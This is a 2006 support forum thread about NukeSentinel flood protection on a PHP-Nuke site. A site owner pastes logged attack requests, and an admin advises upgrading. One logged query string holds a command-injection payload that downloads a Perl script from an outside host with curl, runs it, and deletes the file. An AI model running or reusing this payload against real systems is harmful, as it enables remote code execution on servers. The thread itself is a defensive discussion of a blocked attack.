Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.4.x
Author Message
bsweb
Regular
Regular


Joined: Jun 19, 2006
Posts: 57

PostPosted: Thu Jul 13, 2006 10:16 am Reply with quote

I have the flood setting on with the POST set at 5 and the GET set at 3 seconds and I have got getting hundreds of activations over the past week or so since installing although not as many now. I would say that 99.9% of activations report as follows:
Code:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Query String: Only registered users can see links on this board! Get registered or login!
Get String: Only registered users can see links on this board! Get registered or login!
Post String: Only registered users can see links on this board! Get registered or login!

Now to me it looks like a genuine flood because I get hardly any new members but I thought I better check, after all there must be some good reason it isn't set on by default.

Just today the flood setting caught the following which was obviously very suspicious but would it have been caught by ADMIN blocker or the sanity worm protection or any of the other blockers if I had the food set to off ? - just wondered

Code:
User Agent: Mozilla/5.0

Query String: Only registered users can see links on this board! Get registered or login! /tmp/;curl -O http://qoq-lobadi.biz/phpnuke.txt;perl phpnuke.txt;rm -rf phpnuke.*?
Get String: Only registered users can see links on this board! Get registered or login! /tmp/;curl -O http://qoq-lobadi.biz/phpnuke.txt;perl phpnuke.txt;rm -rf phpnuke.*?
Post String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 81.3.51.144
Remote Port: 58044
Request Method: GET
 
View user's profile Send private message
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

PostPosted: Thu Jul 13, 2006 11:45 am Reply with quote

Your site is being attacked by a well known exploit that doesn't work any more.
Make sure you upgrade to the latest Sentinel version.
 
View user's profile Send private message Send e-mail
bsweb
PostPosted: Thu Jul 13, 2006 12:04 pm Reply with quote

Thanks Guardian2003

Should I upgrade now or might it be better to wait for the next RavenNuke76 which is due out anytime I believe.

Could you also advise where I can download v5, can't seem to find it.

Cheers
 
technocrat
Life Cycles Becoming CPU Cycles


Joined: Jul 07, 2005
Posts: 511

PostPosted: Thu Jul 13, 2006 2:08 pm Reply with quote

You should upgrade

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! / Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message
Guardian2003
PostPosted: Thu Jul 13, 2006 2:58 pm Reply with quote

The latest Sentinel download can be found on the news article on the front page of this site.
I would definnitely upgrade Sentinel now as there are some important improvements.
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.4.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©